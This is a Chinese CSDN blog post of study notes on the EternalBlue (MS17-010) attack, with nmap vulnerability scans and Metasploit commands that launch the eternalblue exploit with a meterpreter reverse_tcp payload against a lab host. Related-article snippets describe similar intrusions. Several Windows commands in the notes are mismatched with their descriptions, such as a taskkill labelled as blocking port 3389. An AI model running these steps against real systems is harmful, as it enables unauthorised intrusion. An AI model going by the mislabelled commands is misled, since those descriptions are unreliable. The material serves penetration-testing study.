永恒之蓝攻击

最新推荐文章于 2024-10-08 20:17:43 发布
最新推荐文章于 2024-10-08 20:17:43 发布
阅读量309 收藏 1
点赞数 11
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55701162/article/details/141924071
版权

格式使用:wmic [系统参数名] list [brief或full] /format:hform >或>> [文件名]
3.通过 sc 工具管理服务,启动 mysql 服务:sc stop sysql
4.通过命令行 CMD 管理 Windows 防火墙,允许 192.168.1.100 连接所有端 口:netsh netsh advfirewall firewall add rule name=ming protocol=TCP localport=8080 dir=in action=allow remoteip=192.168.1.100
5.阻断 tcp/3389 端口连接:taskkill /f /pid3386 /t
6.通过命令行 CMD 管理 Windows 用户,添加 skill 用户至 administrators 组:
net user skill skill /ad
添加一条名为3386入站规则放行3386端口的策略: netsh advfirewall firewall add rule name=3389_test dir=in action=allow protocol=TCP localport=3389


nmap扫描;
nmap 192.168.117.150  扫描开发的端口
nmap --seript=vuln 192.168.117.150  ;扫描存在的漏洞  ————永恒之蓝的漏洞是smb-vuln-ms17-010
nmap -A 192.168.117.150 扫描目标的所有信息
nmap -p 445 192.168.117.150 扫描指定端口扫描
nmap -PA 192.168.117.0 /24 扫描局域网所有IP信息
nmap -sV -v 192.168.117.150 指纹识别扫描

msfconsole


use auxiliary/scanner/smb_ms17_010   -----扫描靶机的信息
set RHOST  靶机地址
run    --- 攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 靶机地址      
set LHOST 攻击机
set payload windows/X64/meterpreter/reverse_tcp
run

search ms17 查询漏洞编号”ms17“
"use 6"  
option ---查询必须的参数   


search ms17
use 8   -----使用8模块
show payloads   ------显示所有载荷模块
set payload 15 ------使用15的载荷模块
options  ------查询必填的内容

裴明杨
关注
永恒之蓝攻击处置方法
不忘初心,护天下安全!
06-09 596
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。详细介绍:永恒之蓝漏洞与Wannacry勒索病毒https://blog.csdn.net/qq_37865996/article
python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
weixin_39839410的博客
12-22 910
1.Metaspolit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。2.术语渗透攻击(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。攻击载荷(Payload):...
python调用msfconsole全自动永恒之蓝攻击_永恒之蓝漏洞攻击完整步骤
weixin_42513170的博客
01-14 1000
需要设备:kali攻击机windows2003/windows2008被攻击机 ip:192.168.15.1291.进行端口扫描nmap -Pn -sV -T4 ip地址明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作2.漏洞脚本检测nmap --script=vuln 192.168.15.129(ip地址)看出ms17-01...
kali基础(利用永恒之蓝攻击window7系统)
2301_76189273的博客
12-14 498
可以看到IP为192.168.2.128的IP字段的网络是畅通的。那么我们就可以将192.168.2.128作为目标主机,实施渗透。ifconfig --> 查看kali 的IP地址。sudo su ---> 切换管理员权限。出现meterpreter则表示入侵成功。然后跟着这个图设置攻击目标主机的ip。search 永恒之蓝的编号。永恒之蓝的编号是:ms17_010。加载msfconsole模块。第一步 进入kali命令行。查看攻击目标的网络是否畅通。等编号加载出来后use 0。
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 2591
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
永恒之蓝漏洞攻击
qq_54250695的博客
05-16 2103
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
kali通过msf利用永恒之蓝攻击服务器
songling515010475的专栏
04-30 5823
1、通过命令“msfconsole”启动msf,或者通过菜单启动msf msf模块说明: exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。 auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。 payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。 post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。 encoders
永恒之蓝上线CS
黑战士的博客
04-20 714
该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。
MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)
hmysn的博客
12-22 2531
永恒之蓝漏洞攻击
在kali中使用msf–永恒之蓝攻击模块windows2008 R2
lkwdoitnow的博客
03-31 1417
准备: kali虚拟机、window2008 R2 虚拟机 请保证kali可以ping通win2008(如果win2008可以pingkali而kali不可以pingwin2008 请检查win2008的防火墙是否关闭) 在kali中输入msfconsole进入msf 选择攻击武器auxiliary/scanner/smb/smb_version 输入show options来查看需要设置的信息 选择攻击对象: set rhosts id(目标主机win2008) 选择网关
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1284
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
[Linux]从零开始的网站搭建教程
c858845275的博客
10-02 1332
讲解了如何搭建运维面板安装web服务器和搭建一个自己的网站。
Linux】进程+权限管理+软硬链接+其他命令
weixin_71491685的博客
10-01 1294
cat /etc/passwd 用户信息文件,用户列表(用户名、用户密码占位符、用户编号uid、用户所在组的编号gid、用户备注说明、用户家目录位置、用户的登陆方式)(8)删除软链接并不影响被指向的文件,但若被指向的原文件被删除,则相关软连接被称为死链接(即 dangling link,若被指向路径文件被重新创建,死链接可恢复为正常的软链接)。ps -aux (用户、进程编号、cpu使用率、内存使用率、虚拟内存的大小、真实内存的大小、终端、状态、启动时间、运行时长)
黑马linux笔记(转载)
pscool的博客
10-01 1850
我们所熟知的计算机是由硬件和软件组成的。计算机系统中由电子、机械和光电元件等组成的各种物理装置的总称。(看的见、摸得着的东西:CPU、内存硬盘、显示屏、鼠标等)是用户和计算机硬件之间的接口和桥梁,用户通过软件和计算机进行交流。(操作系统,就是软件的一类)学习Linux系统,就需要有一个可用的Linux系统。由于Linux系统并不适合日常办公使用,所以我们需要借助虚拟机来获得可用的Linux系统环境进行学习。借助虚拟化技术,我们可以在系统中,通过软件:模拟计算机硬件,并给虚拟硬件安装真实的操作系统。
Linux的基本指令(2)
shylyly_的博客
10-01 1047
Linux的基本指令(2) man nano cp mv which 自制指令 alias echo cat tac > >> < more less head tail |(管道)
linux无法使用ll命令
安的博客
10-02 319
ll命令是ls -l的别名,无法使用通常是该用户没有该别名配置,只需要简单添加即可使用。修改~/.bashrc。
linux中的火墙优化策略
最新发布
weixin_71016778的博客
10-08 450
1.火墙介绍1.火墙介绍1.netfilter2.iptables3.iptablesfirewalld。
VNC轻松连接远程Linux桌面
qq_45748758的博客
10-08 150
Linux配置VNC(以RedHat、CentOS为例)说明:Linux平台安装VNCServerWindows平台使用VNC-Viewer。
msf永恒之蓝攻击win10
09-01
然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统的攻击永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework中使用永恒之蓝攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值